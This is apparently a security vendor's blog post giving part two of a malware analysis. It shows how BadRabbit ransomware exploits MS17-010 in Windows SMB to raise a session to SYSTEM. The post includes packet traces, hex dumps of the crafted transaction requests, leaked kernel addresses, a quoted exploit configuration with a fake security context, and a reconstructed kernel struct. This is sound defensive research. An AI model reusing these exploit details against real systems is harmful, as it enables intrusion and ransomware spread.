![Helping Non-Security Stakeholders Understand ATT&CK in 10 Minutes or Less [VIDEO]](https://assets.crowdstrike.com/is/image/crowdstrikeinc/video-ATTCK2-1)
![Qatar’s Commercial Bank Chooses CrowdStrike Falcon®: A Partnership Based on Trust [VIDEO]](https://assets.crowdstrike.com/is/image/crowdstrikeinc/Edward-Gonam-Qatar-Blog2-1)
![Endpoint Protection and Threat Intelligence: The Way Forward [VIDEO]](https://assets.crowdstrike.com/is/image/crowdstrikeinc/GK-Blog_Images-1)
Overview
This post continues the technical analysis of the BadRabbit ransomware attacks discussed in Part One of this two-part series. Part One described how BadRabbit uses MS17-010 to both leak a transaction data structure, and to take control of two transactions. Doing so allows BadRabbit to modify several areas of kernel memory. Part Two describes the steps taken by BadRabbit to leverage those controlled data structures to elevate the authenticated SMB session to System.Privilege Escalation Analysis
There is no shellcode involved with this exploit. Instead, BadRabbit modifies a security context for the session to get SYSTEM access. This allows a follow-up connection to ADMIN$ that checks for the existence of cscc.dat, and if it doesn't exist, writes infpub.dat to ADMIN$. SMB Close Request, FID: 0x4000 SMB Close Response, FID: 0x4000
SMB Tree Disconnect Request
SMB Tree Disconnect Response
SMB Tree Connect AndX Request, Path: \\172.16.1.133\ADMIN$
SMB Tree Connect AndX Response
SMB NT Create AndX Request, Path: cscc.dat
SMB NT Create AndX Response, FID: 0x0000, Error: STATUS_OBJECT_NAME_NOT_FOUND
SMB NT Create AndX Request, FID: 0x4001, Path: infpub.dat
SMB NT Create AndX Response, FID: 0x4001
SMB Write AndX Request, FID: 0x4001, 1024 bytes at offset 0
SMB Write AndX Response, FID: 0x4001, 1024 bytes
Figure 1: SMB Traffic, Infect Target with BadRabbit
In the Wireshark output there is a "Close Request, FID: 0x4000" and a "Tree Disconnect Request.” This traffic is what happens after the session privileges have been elevated. Note the lack of an “SMB Logoff” request to close the session. Instead, a new Tree Connect request is made, BadRabbit writes itself to the target host, and then uses the SVCCTL RPC to create a service and launch BadRabbit on the target host.
The following sections cover the steps taken by BadRabbit to elevate session privileges for the SMB connection.
Modifying Session→IsNull and Session→IsAdmin Fields
Based on the next transaction, the InData pointer for MID 5851 is going to be overwritten with the address 0x864CFAEE. This address was calculated using the address of offset 0x10 of the leaked MID 5379 transaction.SMB Header
Tree ID:
2048
Process ID:
65279
User ID:
2048
Multiplex ID:
5851
NT Trans Secondary Request (0xA1)
Parameter Count: 0
Parameter Offset: 0
Parameter Displacement: 0
Data Count: 2
Data Offset: 72
Data Displacement: 72
0000h: 00 00 FF 53 4D 42 A1 00 03 00 00 18 01 48 53 4C
..ÿSMB¡......HSL
0010h: 00 00 00 10 00 00 00 00 00 00 00 00 00 08 FF FE
..............ÿþ
0020h: 00 08 DB 16 00 20 12 00 00 00 00 00 00 00 02 00
..Û.. ..........
0030h: 00 00 00 00 00 00 00 30 00 00 00 00 00 00 00 00
.......0........
0040h: 02 00 00 00 48 00 00 00 00 40 00 00 00 00 00 03
....H....@......
0050h: 00 00 00 01
....Leaking the Address of the Security Context
Now that everything is in place, the address of the security context can be leaked.Pointing MID 5851 to the Session Data Structure
MID 5379 is used to to overwrite 48 bytes located at MID 5851 + 0x44. The first three DWORDs are pointers to OutParameters, InData and OutData.SMB Header
Tree ID:
2048
Process ID:
65279
User ID:
2048
Multiplex ID:
5379
NT Trans Secondary Request (0xA1)
Total Data Count:
48
Parameter Count:
4
Parameter Offset:
0
Parameter Displacement:
0
Data Count:
48
Data Offset:
72
Data Displacement:
68
0000h: FF 53 4D 42 A1 00 03 00 00 18 01 48 53 4C 00 00
ÿSMB¡......HSL..
0010h: 00 00 00 00 00 00 00 00 00 08 FF FE 00 08 03 15
..........ÿþ....
0020h: 12 00 00 00 00 00 00 00 30 00 00 00 00 00 00 00
........0.......
0030h: 00 00 00 00 00 00 00 00 30 00 00 00 48 00 00 00
........0...H...
0040h: 44 00 00 00 00 31 00 00 50 60 51 86 38 62 51 86
D....1..P`Q†8bQ†
0050h: 58 FA 4C 86 00 00 00 00 00 00 00 00 08 00 00 00
XúL†............
0060h: 08 00 00 00 08 00 00 00 00 01 00 00 00 01 00 00
................
0070h: 00 01 00 00 00 00 05 00
........ 0x86516050- Overwrites the OutParameters pointer
- Offset 0x18 of the MID 5379 leak
- Used to read the _FLINK for 0x86516038
0x86516238- Overwrites the InData pointer
0x864CFA58- Overwrites the OutData pointer
- Offset 0x10 of the MID 5379 leak
- According to Worawit, this is the address of a session data structure.
Leak the Session Data
The attacker sends an NT Trans Rename request, followed by an NT Trans Rename secondary request using MID 5851. The target responds with 264 bytes of data from the location pointed to by the OutData pointer and the OutParameters pointer.0000h: 28 E0 4E 86 50 00 51 86 0A 02 B0 00 00 00 00 00
(àN†P.Q†..°.....
0010h: D8 17 1A 86 01 00 00 00 00 00 00 00 1C 27 33 93
Ø..†.........'3“
0020h: 1C 27 33 93 01 00 00 00 F0 79 25 86 00 00 00 00
.'3“....ðy%†....
0030h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
................
0040h: 01 8B DD 56 F8 4C D3 01 AC 47 64 5F F8 4C D3 01
.‹ÝVøLÓ.¬Gd_øLÓ.
0050h: FF 3F 96 D5 36 FF FF 7F FF FF FF FF FF FF FF 7F
ÿ?–Õ6ÿÿÿÿÿÿÿÿÿ
0060h: 00 00 00 00 00 00 00 00 7D 15 17 00 00 00 00 00
........}.......
0070h: 40 94 74 CA 18 F8 40 96 0F 0D FE C1 4E AB 4B 99
@”tÊ.ø@–..þÁN«K™
0080h: 00 00 00 00 00 00 00 00 98 94 EE 8C 04 11 02 00
........˜”îŒ....
0090h: 00 08 00 00 02 00 00 00 01 01 01 00 00 00 00 01
................
00A0h: 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00
................
00B0h: 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00
................
00C0h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
................
00D0h: 00 00 00 00 00 00 00 00 00 00 00 00 08 00 00 00
................
00E0h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
................
00F0h: 1C 00 00 00 01 00 00 00 02 00 00 00 00 00 00 00
................
0100h: 00 00 00 00 00 00 00 00
........Prerequisite for Overwriting the Security Context
A MID 5379 transaction modifies itself by using the InParameters pointer to overwrite its own InData pointer with an address calculated from a leaked address located at 0x00 in the OutParameters buffer in Figure 4. Subtracting 0x18 from 0x864EE028 yields the base address of the transaction. This leaked address points to the _FLINK of the transaction located at 0x864EE010.SMB Header
Tree ID:
2048
Process ID:
65279
User ID:
2048
Multiplex ID:
5379
NT Trans Secondary Request (0xA1)
Total Parameter Count:
4
Parameter Count:
4
Parameter Offset:
72
Parameter Displacement:
72
0000h: FF 53 4D 42 A1 00 03 00 00 18 01 48 53 4C 00 00
ÿSMB¡......HSL..
0010h: 00 00 00 00 00 00 00 00 00 08 FF FE 00 08 03 15
..........ÿþ....
0020h: 12 00 00 00 04 00 00 00 00 00 00 00 04 00 00 00
................
0030h: 48 00 00 00 48 00 00 00 00 00 00 00 00 00 00 00
H...H...........
0040h: 00 00 00 00 00 05 00 00 10 E0 4E 86
.........àN†
Figure 6: Use MID 5379 to Change MID of 0x864EE010
It’s currently unknown why MID 5379 is used to take control of another transaction by modifying the MID of 0x864EE010 to 5851. It’s likely related to how the previous one was modified to leak the session data structure. Once this has been completed, the privilege escalation phase begins.
Overwriting the Security Context
A secondary transaction request using MID 5379 is used to overwrite the InData pointer of MID 5851 with the address of the security context to be overwritten. The next MID 5851 request that contains data to be written is going to write at that address. The address of the security context is 0x8CEE9498. This was leaked from the section on using MID 5851 to leak kernel memory.SMB Header
Tree ID:
2048
Process ID:
65279
User ID:
2048
Multiplex ID:
5379
NT Trans Secondary Request (0xA1)
Parameter Count:
0
Parameter Offset:
0
Parameter Displacement:
0
Data Count:
4
Data Offset:
72
Data Displacement:
72
0000h: 00 00 FF 53 4D 42 A1 00 03 00 00 18 01 48 53 4C
..ÿSMB¡......HSL
0010h: 00 00 00 10 00 00 00 00 00 00 00 00 00 08 FF FE
..............ÿþ
0020h: 00 08 03 15 00 20 12 00 00 00 00 00 00 00 04 00
..... ..........
0030h: 00 00 00 00 00 00 00 30 00 00 00 00 00 00 00 00
.......0........
0040h: 04 00 00 00 48 00 00 00 00 40 48 00 00 00 00 05
....H....@H.....
0050h: 00 00 98 94 EE 8C
..˜”îŒSMB Header
Tree ID:
2048
Process ID:
65279
User ID:
2048
Multiplex ID:
5851
NT Trans Secondary Request (0xA1)
Total Data Count:
25
Parameter Count:
4
Parameter Offset:
0
Parameter Displacement:
0
Data Count:
25
Data Offset:
72
Data Displacement:
0
0000h: FF 53 4D 42 A1 00 03 00 00 18 01 48 53 4C 00 00
ÿSMB¡......HSL..
0010h: 00 00 00 00 00 00 00 00 00 08 FF FE 00 08 DB 16
..........ÿþ..Û.
0020h: 12 00 00 00 00 00 00 00 19 00 00 00 00 00 00 00
................
0030h: 00 00 00 00 00 00 00 00 19 00 00 00 48 00 00 00
............H...
0040h: 00 00 00 00 00 1A 00 00 2A 02 1C 00 01 00 00 00
........*.......
0050h: 00 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00
................
0060h: 01 WIN7_32_SESSION_INFO = {
‘SESSION_SECTX_OFFSET’: 0X80,
‘SESSION_ISNULL_OFFSET’: 0X96
‘FAKE_SECTX’: pack(‘<IIIIIIB’, 0x1c022a, 1, 0, 0, 2, 0, 1),
‘SECCTX_SIZE’: 0x1c,
}
Reference
Transaction Data Structure
Part of the following is created from the code on _sleepya’s (Worawit’s) github and the rest is from analyzing the SrvSmbTransaction function in the SMB Driver (srv.sys). This is based on Windows 7 SP1 x86.typedef struct _SMB_COM_TRANSACTION {
0x08:
LPVOID PagePool;
0x0C:
LPVOID ConnectionStruct;
0x10:
LPVOID SessionStruct;
0x14:
LPVOID TreeConnectStruct;
0x18:
LPVOID _FLINK;
0x30:
DWORD Timeout;
0x40:
LPVOID InParameter;
0x44:
LPVOID OutParameter;
0x48:
LPVOID InData;
0x4C:
LPVOID OutData;
0x54:
DWORD MaxSetupCount;
0x58:
ParameterCount;
0x5C:
TotalParameterCount;
0x60:
DWORD MaxParameterCount;
0x68:
TotalDataCount;
0x60:
DWORD MaxDataCount;
0x72:
LPVOID TRANS_FUNCTION;
0x74:
0x78:
WORD Flags;
0x7A:
WORD TreeID;
0x7C:
WORD ProcID;
0x7E:
WORD UserID;
0x80:
WORD MultiplexID;
}
SMB_COM_TRANSACTION;
